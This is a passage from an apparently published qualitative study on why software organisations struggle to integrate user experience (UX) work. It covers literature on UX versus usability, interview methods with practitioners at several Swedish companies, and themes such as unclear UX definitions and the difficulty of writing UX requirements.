of other quality characteristics. in both cases, more than one functionality is affected by the related requirements. however, in the case of ux, this interrelation is more complex, especially considering that ux is dynamic (aka temporal) and thus a user’s perception of the ux underlying elements changes over time (hassenzahl & tractinsky, ). although practitioners may manipulate ux of a product through its underlying elements, they cannot guarantee a certain holistic ux (wright & mccarthy, ; hassenzahl, ). practitioners can only to some extent increase the likelihood of delivering a certain ux (hassenzahl & tractinsky, ). consequently, there is no consensus in the community on how ux should be designed or measured and whether the overall ux of a piece of software can be predicted by merely manipulating and measuring these elements (law, van schaik & roto, ). this is explained further below. ux is dynamic and emerges and changes over time (hassenzahl, ). for example, over time, the user may find a novel feature as old, or a complex feature as simple. hence, in designing and evaluating ux, practitioners should pay certain attention to different episodes of experience (hassenzahl, ); namely expected experience (before usage), momentary experience (during usage), remembered experience (shortly after usage) and accumulated experience (over longer period of use) (hassenzahl, ). practitioners need to decide which episodes are more important than others for the software being developed and why; for instance, for an e-marketing website first impression is more important than it is for a work application. this knowledge can then help them suggest more suitable design solutions. ux research uses the term context-dependent (aka situated) to emphasize that any experience is unique, unrepeatable, and situated in its context (wright & mccarthy, ). nevertheless, experiences can be categorised because their essence is the same, i.e., they connect to essential human needs or be-goals (hassenzahl, ). implications of being context-dependent largely overlap the implications we discussed for the holistic nature of ux. ux is worthwhile (aka positive), meaning that it focuses on value and creating desirable experiences than only preventing negative ones, i.e., the focus of usability (hassenzahl, ). while usability concerns removing problem, frustration, and stress (i.e., negative), ux is based on the idea that removal of dissatisfaction does not necessarily lead to satisfaction and pleasure. through being holistic, ux addresses both satisfiers kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (e.g., fulfilled needs, emerging emotions) and dissatisfiers (e.g., usability or technical problems) (hassenzahl, ). therefore to a large extent, the implications of being worthwhile overlap the implications of its holistic nature. software organizations often face various challenges when dealing with quality characteristics. berntsson svensson et al. ( ) found that if practitioners lack understanding and knowledge about software quality characteristics, they tend to undervalue, and ignore these characteristics during development. berntsson svensson et al. ( ) also report that practitioners are more likely to dismiss those characteristics that are considered less important, e.g., usability is more dismissed than performance. karlsson et al. ( ) show that functional issues are often perceived to be more important than quality issues. based on their findings, practitioners find it difficult to deal with the dependencies between quality requirements and the functionality or other characteristics of the system. limited knowledge and awareness has also been reported as one of the challenges to usability work (rosenbaum, rohn & humburg, ). bak et al. ( ) report that developers’ minds are set more on the programming aspect of the product than its usability, and they often misunderstand the term ‘‘usability evaluation’’ and often relate it to functionality. gulliksen et al. ( ) report that limited awareness in different levels of organizations, in particular at the management level, can lead to down-prioritizing usability. they therefore suggest increasing knowledge and awareness about usability among different stakeholders and in various levels of organizations, in particular among management. other studies show that, in general, practitioners find it more difficult to perform requirements and testing activities for quality characteristics than for functionality (paech & kerlow, ; berntsson svensson et al., ; chung & do prado leite, ). for instance, it is generally more difficult to document quality requirements in a measurable way, or handle their dependencies to functional requirements (berntsson svensson et al., ; karlsson et al., ; borg et al., ; nuseibeh & easterbrook, ). borg et al. ( ) report that lack of competencies to handle quality characteristics in projects often leads to ignoring related requirement in projects. even if these requirements are properly quantified (specified in a measurable manner), they require suitable competencies to be tested and verified. similar problems have also been discussed in the usability literature. practitioners find it challenging to document measurable usability requirements (cajander, lárusdóttir & gulliksen, ; gulliksen et al., ). ardito et al. ( ) showed that if practitioners fail to include usability in requirements documents, these requirements might be ignored later in testing. the limited access to competencies and unclear responsibilities are also reported as challenges to better usability work. for instance, rosenbaum, rohn & humburg ( ) report that lack of usability professionals is one of the main obstacles organizations face concerning usability. boivie, gulliksen & göransson ( ) show that even in cases when organizations have access to the right expertise, usability professionals are not sure about their responsibilities, and are uncertain as to how to contribute to the projects. chamberlain, kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sharp & maiden ( ) report that power struggles rise as designers within a project defend their discipline in response to the decisions made by developers, and vice versa. despite the differentiation of ux and usability, only a limited number of empirical studies have so far analyzed the implications of these differences. one example is the study by vermeeren et al. ( ) that compares the challenges of evaluating usability and ux. they argue that some of ux evaluation methods need to be further improved and developed for better use in practice. according to vermeeren et al., there is still a lack of suitable methods for evaluating ux in earlier development phases or in the period before actual use (i.e., anticipated use). they also highlight that current methods are not often practical because they need special expertise, are time consuming, or their data analysis is hard. similarly, isomursu et al. ( ) discuss that practitioners face difficulties in ux work compared to usability work because they do not have access to tools and methods to objectively measure ux. law, van schaik & roto ( ) explore the basic question of whether ux elements are measurable. they report that their interviewees expressed skepticism and ambivalence towards specific ux measures even if attitudes were more positive overall. they note that practitioners show opposing views on whether ux can or should be divided into composing elements, or whether it needs to be considered or measured as a whole. results from their interviews show three categories of challenges concerning the interplay between ux evaluation and software development: (i) theoretical (measuring ux holistically or in elements, and conceptualizing long-lasting versus momentary experience), (ii) methodological (differing preferences for quantitative versus qualitative data by design- and engineering-oriented stakeholders), and (iii) practical (lack of knowledge and competencies for interpreting measurement outcomes). the participants in the law et al.’s study emphasized they need to use a variety of media (e.g., video, tv, social media) to develop the required prototypes for measuring ux and that they often even need more than one such prototype to gather enough input for design. their practitioners also argued that ux measures are essentially prone to fading and fabrication, or that there is a lack of means to measure the exact emotion of users at each moment (law, van schaik & roto, ). the work of law, van schaik & roto ( ) is duplicated in the context of the latin american software development industry by gerea & herskovic ( ). they conclude that practical aspects such as cost and time play a more important role in whether or not practitioners measure ux. other challenges reported by gerea et al. include: limited access to the end users, and lack of knowledge and experience in ux measurement similar to what vermeeren et al. ( ) found. alves, valente & nunes ( ) investigated how ux evaluation is performed in practice (i.e., by whom, in what phases of software development, and using what tools and methods). according to their data, in around % of the cases ux evaluation is performed without involving the end users, and often evaluators ‘assume’ what the perception of users will be. alves, valente & nunes ( ) also report that sometimes evaluations are performed by software developers that do not necessarily have the required competencies. also, often tools and methods are selected based on cost rather than suitability for the project. alves el al. used a list of evaluation tools and methods that are mainly usability-specific and kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. see http://www.allaboutux.org for more ux-specific tools and methods. here, we use the terms ‘ux practitioner’ and ‘non-ux practitioners’ to respectively refer to practitioners who have ux- related roles and responsibilities in the organizations and those who do not. lack ux-specific methods (e.g., attrakdiff questionnaire (hassenzahl, burmester & koller, ) ). this can introduce a risk to their data because practitioners might have preferred the use of a generic method such as a questionnaire for evaluating ux, without necessarily acknowledging that such generic methods may purely produce usability-related data if not used with specific attention to ux-related concepts, such as the non-tasks-related aspect of use (hassenzahl, diefenbach & göritz, ). studies also show that the perception of ux is generally different in academic and industrial contexts. väänänen-vainio-mattila, roto & hassenzahl ( ) report that practitioners still focus more on functionality and usability issues in their ux work. similarly, in kuusinen & väänänen-vainio-mattila’s ( ) study in a large software organization, ease of use and efficiency were the most often reported sources of good ux. hence, these studies conclude that while academia concentrates more on the hedonic aspect, the industry focuses more on the pragmatic aspect. as we saw, those studies that explicitly take differences between ux and usability into account, mainly focus on evaluation activities and the role of ux measures in challenges practitioners face. they therefore do not sufficiently discuss other aspects of ux work, for instance requirements or communication and collaboration between ux and non-ux practitioners. in addition, those studies that report software organizations often focus more on usability than ux rarely provide an explanation for this lopsided focus. hence, there is a need for further empirical studies that investigate the role of ux characteristics and differentiate ux from other software quality characteristics including usability. our study is a response to this research gap. methods we have conducted an explorative, qualitative study (braun & clarke, ) to investigate the challenges to integrating ux practices into software development processes. below, we detail our research approach by describing the different companies where we conducted interviews, how the data was collected, and our approach to data analysis. research sites we selected a variety of companies with different characteristics for our study in order to improve the generalizability of our findings (runeson & höst, ). table shows an overview of these companies and their main characteristics and labels them (a–h) for easier reference later in the paper. the companies span various domains (company type) and vary in size (number of employees). we approached both consultancy and product development companies in order to cover both perspectives. both a and e are well-known consultancy companies in sweden, while b, c, d, and h are well-known product development companies in sweden. throughout the study, we were introduced to additional companies by our interviewees, and we also included a number of interviewees from those companies (f and g). company f is an international consultancy company, also active in sweden. company g is an american company. only one of the companies (e) was previously known to the authors based on previous research collaborations. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.allaboutux.org https://peerj.com http://dx.doi.org/ . /peerj-cs. table overview of the companies that participated in the study. company type number of employees (a) it services, consultancy & outsourcing > , (b) defense & security ∼ , (c) wireless solutions & network testing ∼ , (d) systems & software development company ∼ (e) user experience consultancy & training ∼ (f) it & management consultancy > , (g) user experience & usability consultancy (h) telecommunication ∼ , table the interviewees who participated in this study. code roles & responsibilities field of education industrial experience (since) a- business developer, ux lead & interaction designer cartoonist a- interaction designer & ux designer computer science & interaction design a- project leader & developer computer science a- art director & graphical designer photography b- software engineer & project manager psychology & electrical engineering b- technical product manager computer science b- senior project manager computer science b- product manager & project manager computer science b- technical project manager & requirements analyst computer science b- system developer & interaction designer computer science & interaction design c- ux lead & interaction designer cognitive science d- system developer & requirements analyst computer science e- business developer, ux lead & interaction designer software engineering f- ux lead & human factors specialist cognitive science g- manager, design strategist & ux lead design h- manager, design strategist & ux designer multimedia & interaction design h- ux designer multimdeia & design data collection the aim of the interviews was presented to our main contacts in each company to assure selected interviewees were suitable for our research. the selected practitioners (see table ) represent technical (e.g., developers), design (e.g., interaction designers), and management roles. we had the option to ask for more interviewees, but since the study was explorative, after interviews we were confident that we had covered the major challenges from a sufficiently broad range of perspectives. we conducted semi-structured interviews (flick, ) to collect more of the interviewees’ viewpoints, which was important to the explorative nature of our study. the questions covered different phases of development processes, and also the concept of ux and how it differed from usability in the interviewee’s eye. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. transcribing the interviews segmenting the interview transcripts e.g. initial codes: - ux vs. usability - motives - definition - tools and methods identifying the key points in each segment coding the segments conducting the interviews data collection data analysis creating the initial set of codes creating the interview guide literature review formulating the research question preparation creating new codes categorizing the coded segments creating the themes a segment per row in the excel file coding was performed in an excel file: each row was coded, using separate codes in different columns excel macros were used to generate separate sheets for each code from different interview transcripts challenge code key point interview transcript theme levels of data abstraction figure process of data gathering and analysis. full-size doi: . /peerjcs. /fig- we prepared an interview guide with a set of pre-designed questions based on the knowledge gained from literature. in each interview, questions were rephrased, added, or skipped based on the interviewee’s background and responses. each interview covered all phases of software development, the activities performed in each phase, and the tools and methods applied. thirteen of the interviews were conducted face-to-face, and four via video or telephone conference. each interview lasted between – min, and was recorded and transcribed. the interviews were all performed in the spring of . data analysis figure provides an overview of the data gathering and analysis process. we applied thematic analysis as described in braun and clarke (braun & clarke, ) to encode and analyze the interview data. we segmented the interview transcriptions into meaningful paragraphs or sentences in a way that each of these segments presented one concept. we then coded these segments (braun & clarke, ). we used microsoft excel to document the coded data. each interview transcript was recorded in a separate sheet. segments of this transcript was recorded in separate rows, and different codes were assigned to each segment in separated kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. columns, following that segment. after coding, categories of challenges, i.e., themes, emerged as we put together similar concepts presented in the coded segments. a mind-map of challenges and categories was created to better identify and visualize the relations. we created a pilot list of codes (braun & clarke, ) that was iteratively refined. the initial codes captured challenges and their context and included: definition, challenges, solutions, tools and methods, evaluations, requirements, ux versus usability, and activities. as the interviewees mentioned various challenges, we asked follow-up questions to better understand attempted solutions, or previous experiences with usability or other quality characteristics in relation to similar challenges. when the interviewees used different terminologies, or had limited knowledge concerning ux or usability, we mapped their statements to the relevant concepts based on the definitions of the concepts in literature. for instance this statement: ‘‘there is a bit of confusion in the field and in the company as well, what’s the difference? design is design’’ (a- ) mapped to these key points: definition of ux is not clear, and practitioners do not know what ux exactly means. this statement was then coded as ‘challenge’, and ‘definition’. segments that related to understanding and definition of ux, such as this example, resulted in the theme ‘lack of consensus on definition and construct of ux’. threats to validity threats to validity are outlined and discussed based on the classification by runeson and höst (runeson & höst, ): selection process of subjects for interviews can cause a threat to construct validity. selection bias is always present when subjects are not fully randomly sampled. however, our subjects were selected based on their role, experience and availability so there is little more we could do to alleviate this threat. the presence of a researcher may influence the behavior and response of the subjects. this threat was alleviated somewhat by the guarantee of confidentiality of the data but is an inherent limitation of the research method used. in any empirical study, incorrect data is a threat to internal validity. interviews were audio recorded to mitigate this threat. the authors also analyzed the material in several rounds of independent as well as joint sessions to gradually reach consensus on the intended meaning of the respondents. we also shared the results of our analysis with the interviewees to validate and confirm the findings. external validity concerns the ability to generalize the results beyond the actual study. since the interviews are just a sample from a potentially very large population, they should be interpreted with some caution. we sampled a number of different organizations in different industrial domains to decrease the effect of this threat. in addition, the majority of the organizations we studied are swedish (exceptions are g (american), and f (dutch)), and the culture of swedish software industry can have an impact on how the studied organizations perceive and address ux or other quality characteristics. this distribution however is not sufficient to draw any conclusions based on the cultural differences of these companies, and in interpretation of findings this matter needs to be taken into consideration. qualitative studies rarely attempt to generalize beyond the actual setting and are more concerned with explaining and understanding the phenomena under study. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. theme : lack of consensus on definition & construct of ux theme : lack of consensus on the value of ux theme : low industrial impact of ux models, tools & methods theme : focus on objectively measurable aspects of software theme : difficulties in engineering ux-related requirements theme : focus on evaluating functionality & usability, not ux theme : lack of consensus on ux related competencies & responsibilities theme : communication & collaboration gap between ux & non-ux practitioners themes of challenges more tactical more fundamental inclu des explains figure the identified themes of challenges. full-size doi: . /peerjcs. /fig- another concern is that our data gathering was performed in the spring of . therefore, our data may not reflect today’s ux state-of-practice in the studied organizations. however, the data is valid when interpreted in its own time frame. also, to minimize the effect of the time frame on our analysis, we have included recent studies published since when discussing the results. another threat concerns reliability, the extent to which the data and analysis are dependent on the specific researchers. although the coding process is performed by the first author, to improve reliability of the generated themes, the three authors individually and independently conducted a pilot coding of these segments using an initial coding guide as explained above. the outcomes of the pilot coding were discussed in several sessions with all three authors, and the differences in coding were analyzed and resolved. also, we had carefully designed the interviews before running them. we also defined the coding process after the interviews and before analyzing the data. the initial codes were therefore identified mainly based on observed interview responses. we also ensured the themes are not imposed on the data rather emerged from it. results this section presents eight themes of challenges that emerged from the interview data (see fig. ). these themes are described and supported by the interviewees’ quotations. each quotation is provided with the interviewee’s code, and labeled either ‘se’ or ‘hci’ to reflect the community to which the interviewee belongs. this helps better understanding of the current state of practice from these two perspectives. theme . lack of consensus on definition and construct of ux our data shows that practitioners’ understanding of the concept of ux differs and is, in some cases, even inconsistent and contradictory (see fig. ). according to the respondents, ux is a new concept and there is a lack of general agreement on its meaning in the field in kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. theme : lack of consensus on definition & construct of ux practitioners have different understandings of ux practitioners have inconsistent & contradictory views on ux customers have limited knowledge about ux there is a lack of consensus on meaning of ux both in research & practice ux is seen as equal to usability or ixd includes figure challenges concerning definition and construct of ux (theme ). full-size doi: . /peerjcs. /fig- general, and among practitioners within organizations in particular. in some practitioners’ view, ux is the same as usability or interaction design (ixd) despite the fact that ux includes the user’s subjective perception and overall experience. the lopsided focus on usability and ixd can be explained by their relative simplicity: ‘‘i think discussions at large when it comes to ux design at common ground is still about ixd and usability. usability is easy to talk about and everybody understands it.’’ (a- /hci). one of the interviewees referred to ux as ‘‘just another buzz word’’ (e- /hci). in her view, ux contains the same concepts that have been around for a long time under other names such as usability and emotional design. on the other hand, some practitioners explicitly differentiated between ux and usability. one of the participants emphasized that usability is ‘‘a minor subset of ux’’ and added: ‘‘i’ve never, ever called myself a usability expert, and i would never do that.’’ (h- /hci). similarly, another practitioner stressed that ux is not about ixd and has a much broader perspective: ‘‘[ixd] is just the end results, we do not call ourselves interaction designers, because that is only % of our work but that is an important element because that is the most visual part of our work .’’ (f- /hci). similarly, another practitioner referred to ux as: ‘‘a wholeness with the emotional, social, economical, functional, and technical parts.’’ (a- /hci). another practitioner described ux as: ‘‘pretty much everything that affects a user’s interaction with a product.’’ (h- /hci). he further emphasized ux is ‘‘the whole package’’ and usability is only one part of it. a number of practitioners stated that ux is a ‘broad’ and ‘holistic’ concept covering not only the user perspective, but also the business perspective. while the latter looks into how the design contributes to achieving business goals, the former assures satisfying the end users’ needs. the user perspective includes aspects such as ‘emotions’, ‘values’ and ‘preferences’. some practitioners related ux to the ‘why’ behind the functional requirements and the software in general. for instance, one practitioner described this through three main questions of ‘what’ to build, ‘how’ to build it, and ‘why’ to build it (a- /hci). some practitioners related ux to the gui by stating that it is about ‘‘the cool things, the new things, the flashy things.’’ (a- /se). in their view, ux is mainly about emotions and aesthetics therefore not applicable to all types of applications, for instance ‘productivity applications’. in general, the practitioners with technical backgrounds showed limited knowledge about ux. their knowledge was often limited to cognitive aspects of design, i.e., usability. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. theme : lack of consensus on the value of ux b b businesses do not value ux enough ux is often down- prioritized to functionality management does not value ux, e.g. as part of the business strategy customers down- proritize ux & do not value it stakeholders have different views on the importance of ux includ es business stakeholders do not value ux cost of ux is not justified for customers figure challenges concerning value of ux (theme ). full-size doi: . /peerjcs. /fig- one of the technical managers stated: ‘‘ [our customers] talk about increased workload. that is a negative thing. i don’t know if that qualifies as ux.’’ (b- /se). on the other hand, a ux practitioners emphasized that ux ‘‘goes beyond cognitive aspects of design’’ (e- /hci), the main focus of usability. the participants also discussed that customers’ limited knowledge about ux is a challenge. customers who have heard about ux can be too ambitious regarding emotional and non-task-related user needs. customers’ limited knowledge also means that they often specify the related requirements vaguely and using inconsistent and subjective terminology. they often indicate a need for quality characteristics such as ‘cool’, ‘fun’, or ‘high-tech’ mostly because they are affected by such ‘buzz words’ while they do not necessarily know what these terms actually mean. practitioners emphasized that to prevent misunderstandings ux-related requirements should be refined early on to concrete requirements and specified in a measurable way. regarding this one of the interviewees said: ‘‘usually they say ‘we want something like that app’, ‘we want it to be cool and high tech’. then you have to initiate a dialog to find out what that means for this particular customer.’’ (a- /hci). theme . lack of consensus on the value of ux generally speaking, our data shows that various stakeholders have different views on whether ux is important or not (see fig. ). a group of the interviewees believed ux of software is increasingly important because of the growing general importance of software in recent decades. interactions users had with earlier software were limited to command-line, and software was mainly built to support existing manual work. software is now a large part of life, and users are exposed to a variety of interaction styles (mouse, touch, etc.), and experiences. this exposure to various software systems affects the experience and kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. expectations of users. regarding this, one practitioner said: ‘‘users are meeting a lot of good things, and they are expecting good things all the time.’’ (e- /hci). according to the practitioners, various businesses are learning from successful products in the market. this has inspired not only market-driven but also business-to-business software projects. this is supported by one of the interviewees saying: ‘‘a lot of business- to-business applications are being informed by business-to-consumer apps.’’ (g- /hci). in particular, in cases where a product has competitors, the motivation to improve ux increases. one of the practitioners argued that ux is now a ‘differentiator’: ‘‘today i think that many companies do usable products, in order to distinguish a brand or a product we need to add an extra level to the product so that is really what i call ux. we need to take more things into account, e.g., emotions, and that it needs to look great, and it is not only about being usable.’’ (a- /hci). in market-driven products, branding, emotional concerns, and relations with end users are important. therefore, in our participants’ views, these businesses are often more concerned about ux. another interviewee argued that for market-driven software, in particular game development, ux is ‘‘part of the common practice’’ (a- /hci) while this is not the case for business-to-business software. he further emphasized this approach of market-driven projects should be ‘‘transferred to other projects’’ as well. some of the practitioners emphasized that ux is an important software quality characteristic that needs to be taken into account more in projects. however, in some functionality-focused organizations, ux is considered something ‘‘on the side’’ and not a core concept or value. according to these practitioners, the business units often focus on functionality and not ux. as one of the interviewees emphasized, in this case the business unit is not ‘‘that concerned with the look and feel’’ (a- /hci). the practitioners were generally positive that more and more organizations, even the technology-focused ones are learning about ux and the importance of taking it into account in their products. for instance, one practitioner said that in their company, business units now show less resistance towards ux and the importance of ux ‘‘starts to be visible’’ (h- /hci) to these units. in addition, the interviewees emphasized managements’ preferences, values, and motivations also influence ux work in organizations. regarding this, one practitioner stated: ‘‘i think it’s sometimes just the reason people go into business in the first place ...the people who are in it because they think that their product or service solves a real problem, they generally care about ux more.’’ (g- /hci). this interviewee further discussed how individuals, in particular higher management, play an important role in whether ux is a priority in an organization or not. one of the interviewees stated that the inputs from their ux group in research and development are ignored by business units because some of the ideas are ahead of their time while these units tend to focus on near future: ‘‘business units are occupied with their very close, near time results so they look at what they can sell now.’’ (h- /hci). he further highlighted that some of these previously rejected ux ideas are now being incorporated in the products and are getting support from management because competitors now implement similar ideas. another challenge is that customers often resist taking on the costs of performing ux work. in practitioners’ view, often customers are not aware of ux and its value, and kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in particular how it differs from usability and ixd. regarding difficulties in convincing customers, a practitioner said: ‘‘it can be hard ...if you have to have three weeks extra to make the graphics work in a certain way, they might think it’s unnecessary. and maybe the software’s going to work fine, but if they made these extra efforts or put in this extra amount of money, they would have actually gone much, much further maybe.’’ (a- /hci). as a way to convince customers to agree to the cost of ux practices, one of the organizations (a) uses examples of successful products in the market that are known for their good ux (e.g., apple). another organization (f) uses fixed prices for their projects so that practitioners can freely spend part of the budget on ux practices. some practitioners emphasized that they talk about ux ‘indirectly’. they connect ux to business goals, and argue for ux from the point of view of the business success, and not the end users. an interviewee motivated this by saying: ‘‘if you start babbling about usability and strange kind of things, they will say ‘oh! i don’t want to pay for this’.’’ (e- /hci). according to some practitioners, ux practices should be sold to the customer as part of the contract to assure coverage of the associated costs. this requires showing how such practices will add value to the software and have a return on investment (roi) for the customer. nevertheless, often presenting a roi is difficult. this is illustrated by a ux prac- titioner who said: ‘‘i don’t think you can put roi into a proposal necessarily. i think that’s irresponsible, frankly. because % of the time, we don’t understand the true and false nature of an issue when we’re writing a proposal. it’s only after working with a client for a little bit of time that we begin to see the nuance there. that usually undercuts any kind of under- standing that’s used to generate proposed improvements in roi, for example.’’ (g- /hci). theme . low industrial impact of ux models, tools and methods we identified a number of challenges concerning how practitioners apply ux theories, tools and methods (see fig. ). we observed that often practitioners’ knowledge regarding ux is based on experience and work with similar concepts, not on any specific ux models or theories. some practitioners had formal training in usability and ixd and used that foundation to build ux skills over time in an ad hoc way. for instance, one of the practitioners stated: ‘‘when i first started in the s, there was no such thing as ux or ixd, actually ... [then] it has been ixd and then sort of merged into ux design.’’ (h- /hci). in general, the interviewees were not familiar with currently popular approaches to ux and corresponding models, even those interviewees that demonstrated a relatively good understanding of ux. one interviewee (a- /hci) stated that she handles users’ emotions, values etc. ‘in a non-academic way’, another interviewee (a- /hci) said that the way she handles ux is not formal or ‘by the book’. the practitioners generally showed a positive attitude towards applying new models, tools, methods and techniques to their work: ‘‘we are lacking this, so this would be really nice to have more research results that we could apply.’’ (a- /hci). however, often organizations resist introducing new models, tools, methods, or techniques. hence, in the studied organizations, practitioners often only rely on traditional interview and observation techniques in their work with ux. the interviewees referred to two models they use in their ux work: ‘emotional design’ by donald norman and maslow’s hierarchy of human needs. the latter is used as an kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. theme : low industrial impact of ux models, tools & methods organisations resist to introduce ux tools & methods current ux theories are often unknown to practitioners knowledge on ux is gained individually & in an ad hoc way & not through theories includes ux practitioners apply only traditional tools & methods figure challenges concerning industrial impact of ux theories (theme ). full-size doi: . /peerjcs. /fig- theme : focus on objectively measurable aspects of software stakeholders focus on functionality & often down-prfioritize quality characteristics stakeholders focus on actual quality characteristics & often down-prioritize the perceived qualities stakeholders focus on objectively measurable quality characteristics includes too much focus on functionalities can lead to ignoring ux the relation of functionality and ux is often not taken into account figure challenges concerning subjective aspects of software (theme ). full-size doi: . /peerjcs. /fig- inspiration when eliciting user needs. the interviewees mentioned that such models can help create a methodology to work with ux and ‘‘build the right things in the right order’’ (f- /hci). respondents with this type of experience were a clear minority. theme . focus on objectively measurable aspects of software another identified theme of challenges concerns how the studied organizations handle subjective aspects of software (see fig. ). a group of practitioners emphasized that the software development and engineering community has traditionally had much greater focus on software functionality. one practitioner stressed the relation between functionality and ux as follows: ‘‘the quality of experience is really depending to some extent on how the functional requirements are met, but also actually on what the functional requirements are, also just the amount of them.’’ (h- /hci). this interviewee further emphasized: ‘‘for us, technology is the material that we can shape in order to create experiences.’’ the interviewees emphasized that satisfying functional requirements does not necessarily mean that the software includes correct or valuable functionality. this is evidenced by one interviewee saying: ‘‘what do you know when you have signed [the technical specification]? do you know that it is a good solution? no! you only know that it meets the functional requirements and to me it is silly!’’ (e- /hci). in addition, the participants believed that the software community often focuses more on ‘actual’ than ‘perceived’ quality characteristics of software. while the former concerns kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. theme : difficulties in engineering ux- related requirements to-be goals/non-task related needs are either ignored or treated informally traceability between ux- related & business requirements is often lost in projects customers are too ambitious regarding ux-related requirements customers use wrong terminology for ux-related requirements practitioners lack guidelines on mapping non-task-related needs to measurable requirements it is difficult to involve users to assure addressing ux-related requirements includes non-task-related needs are hard to elicit, refine, communicate & agree upon practitioners lack tools & methods to deal with non-task- related needs practitioners need forms other than text to communicate ux- related requirements it is difficult to find a balance between business & technical & ux-related requirements there is a lack of consensus on to what extent users should be involved in projects user involvement is perceived to be time- consuming functional requirements are easier to define & translate to design solutions than ux- related requirements there is a lack of consensus on the order of eliciting & refining functional vs. ux- related requirements figure challenges concerning requirements work (theme ). full-size doi: . /peerjcs. /fig- objectively measurable quality characteristics, the latter concerns how users subjectively perceive these qualities. for instance, users may perceive a response time of ms (i.e., actual performance) as fast or slow (i.e., perceived performance). regarding the role of perceived qualities in experience of users an interviewee stated: ‘‘sometimes the perception of time is more important than the actual time, and these are the things you should pinpoint [to the stakeholders].’’ (e- /hci). theme . difficulties in engineering ux-related requirements another identified theme of challenges concerns handling ux in requirements work (see fig. ). according to the practitioners, in many cases, the non-task-related needs of users (i.e., their be-goals) or their emotions are either neglected or treated only informally: ‘‘we’d specify this more in the persona descriptions; for example that this persona needs to, or wants to experience some kind of things. in the wireframes, we might specify an animation for example that it should feel smooth or something like that.’’ (a- /hci). for instance, in one of the organizations, emotional design goals are often only documented and communicated in the form of a ‘‘post-it note on the wall’’, as a reminder. although the interviewee emphasized this approach is not optimal and there is a need for more formal approaches to deal with such requirements: ‘‘it should be good if we could formalize it a little bit more i think.’’ (a- /hci). the practitioners highlighted that it is an open problem as to how to map these types of needs to measurable requirements. for instance, one of the interviewees stated: ‘‘i would say the emotional part of this is very very rarely formally put into words.’’ (a- /hci). in kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. particular, when the software product is innovative, these problems are compounded. this is evidenced by an interviewee saying: ‘‘this is a kind of project where nobody really can tell how this should be, what it should be like, nobody has done it before, there are no standards to refer to ...who can specify those [ux-related] requirements? you need to have a certain quality but what is the suitable level of that quality? we haven’t really found what that level is.’’ (b- /se). the practitioners generally agreed that to communicate ux-related requirements, they require forms other than text (e.g., sketches, wireframes). they emphasized ‘‘concrete and tangible’’ forms can facilitate communicating these intangible and abstract requirements, and ensure that be-goals as well as do-goals are taken into consideration. regarding this an interviewee told us: ‘‘we create ‘mood boards’ where you take an image-driven approach to the look and feel, and we use references of course, like ‘that app has a good flow in it’, and ‘that app has a good feeling to it’.’’ (a- /hci). practitioners with technical backgrounds also seemed to have a similar approach to ux-related requirements: ‘‘if the customer said that they want it to ‘look nice’, then you have to make the graphical design first and then they can say ‘hey! this looks nice’ and then you have taken care of that requirement.’’ (a- /se). it is important that these non-textual ux-related requirements (e.g., wireframes) are traceable to other requirements. regarding this a practitioner stated: ‘‘at the end we show the wireframes with all kinds of numbers and those numbers are linked to the excel sheets of the requirements, their descriptions and how they are linked with the cpr and business case.’’ (f- /hci). practitioners related these problems to a lack of competence in dealing with ux-related requirements within their organizations: ‘‘i think it is largely a competence thing. doing emotional aspects of design is quite a new concept, i have only heard about it in the last year, or last two years maybe, so i do not think that knowledge has really reached the industry yet.’’ (a- /se). ux practitioners believed that handling functionality is comparatively easy and straightforward. regarding this, one practitioner highlighted: ‘‘features are what most project managers, most managers can understand. you can count them, you can map them to customers, customer dialog for instance, and so forth, and you can compare your amount of features with the competitors...when it comes to both features and user experience requirements—features are a bit easier to define somehow, because you can say things like, ‘right, we need an email component with this capability’’’ (h- /hci). as another example, an interviewee stated: ‘‘functional requirements are easy to create, to merge into a design; more emotional things are more difficult.’’ (f- /hci). ux practitioners argued that ux-related requirements should be elicited before refining functional requirements. for instance, one interviewee stated: ‘‘first you have to define the business requirements, the user requirements, the ixd, then you can define the functional requirements.’’ (e- /hci). another practitioner said: ‘‘i think that the functional requirements should come as a result of a dialog between different types of domains such as user experience, business, and technology.’’ (h- /hci). nevertheless, according to these practitioners, such an approach is not common in practice. this is inline with the view of practitioners with technical backgrounds who believe the requirement process should start by first eliciting and refining functional requirements and then quality requirements. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. some practitioners highlighted the challenge of finding a balance between ux-related needs, business goals, and technological constraints. regarding the importance of finding a balance between emotional and business needs, one of the interviewees stated: ‘‘you can spend a lot of time, thinking about people’s emotions and so on, but if you are going to succeed you have to look at the business perspective.’’ (e- /hci). in addition, according to the interviewees, while customers should be involved to assure alignment of projects with business perspectives, the end users should be involved to assure alignment with ux-related needs, and practitioners require to find a balance between these needs. as an example, an interviewee stated: ‘‘we can buy the best camera in the world, users will have a better image quality 